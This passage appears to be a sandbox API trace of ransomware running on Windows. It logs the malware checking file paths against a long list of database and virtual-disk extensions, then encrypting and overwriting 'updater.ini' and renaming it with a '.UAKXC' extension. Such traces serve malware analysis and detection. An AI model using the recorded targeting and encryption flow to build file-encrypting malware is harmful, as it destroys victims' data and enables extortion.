[0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".exb") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fcd") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fdb") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fic") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fmp") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fmp12") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fmpsl") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fol") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fp3") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fp4") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fp5") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fp7") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fpt") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".frm") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".gdb") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".grdb") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".gwi") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".hdb") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".his") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ib") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".idb") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ihx") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".itdb") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".itw") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".jet") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".jtx") returned 0x0 [0140.226] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".kdb") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".kexi") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".kexic") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".kexis") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".lgc") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".lwx") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".maf") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".maq") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mar") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mas") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mav") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mdb") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mdf") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mpd") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mrg") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mud") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mwb") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".myd") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ndf") returned 0x0 [0140.227] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nnt") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nrmlib") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ns2") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ns3") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ns4") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nsf") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nv") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nv2") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nwdb") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nyf") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".odb") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".oqy") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".orx") returned 0x0 [0140.228] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".owc") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".p96") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".p97") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".pan") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".pdb") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".pdm") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".pnz") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".qry") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".qvd") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".rbf") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".rctd") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".rod") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".rodx") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".rpd") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".rsd") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sas7bdat") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sbf") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".scx") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sdb") returned 0x0 [0140.229] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sdc") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sdf") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sis") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".spq") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sql") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sqlite") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sqlite3") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".sqlitedb") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".te") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".temx") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".tmd") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".tps") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".trc") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".trm") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".udb") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".udl") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".usr") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".v12") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vis") returned 0x0 [0140.230] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vpd") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vvv") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".wdb") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".wmdb") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".wrk") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".xdb") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".xld") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".xmlff") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".abcddb") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".abs") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".abx") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accdw") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".adn") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".db2") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".fm5") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".hjt") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".icg") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".icr") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".kdb") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".lut") returned 0x0 [0140.231] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".maw") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mdn") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".mdt") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vdi") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vhd") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmdk") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".pvm") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmem") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmsn") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmsd") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".nvram") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmx") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".raw") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".qcow2") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".subvol") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".bin") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vsv") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".avhd") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmrs") returned 0x0 [0140.232] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vhdx") returned 0x0 [0140.233] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".avdx") returned 0x0 [0140.233] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".vmcx") returned 0x0 [0140.233] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".iso") returned 0x0 [0140.233] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.233] WriteFile (in: hFile=0x6c8, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.294] WriteFile (in: hFile=0x6c8, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.295] SetEndOfFile (hFile=0x6c8) returned 1 [0140.295] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.295] ReadFile (in: hFile=0x6c8, lpBuffer=0x5030000, nNumberOfBytesToRead=0x4dd, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x4dd, lpOverlapped=0x0) returned 1 [0140.295] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffb23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.295] WriteFile (in: hFile=0x6c8, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x4dd, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x4dd, lpOverlapped=0x0) returned 1 [0140.295] CloseHandle (hObject=0x6c8) returned 1 [0140.299] GetProcessHeap () returned 0xea0000 [0140.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef06f0 [0140.299] lstrcpyW (in: lpString1=0xef06f0, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" [0140.299] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.UAKXC" [0140.299] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.UAKXC" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.uakxc")) returned 1 [0140.300] GetProcessHeap () returned 0xea0000 [0140.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef06f0 | out: hHeap=0xea0000) returned 1 [0140.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0140.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf18 | out: hHeap=0xea0000) returned 1 [0140.300] Sleep (dwMilliseconds=0x1f4) [0140.880] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0140.880] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0140.880] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0140.881] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn")) returned 0x2022 [0140.958] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0140.958] GetLastError () returned 0x0 [0140.958] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=350) returned 1 [0140.958] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.958] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.958] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.958] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.959] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.960] StrStrIW 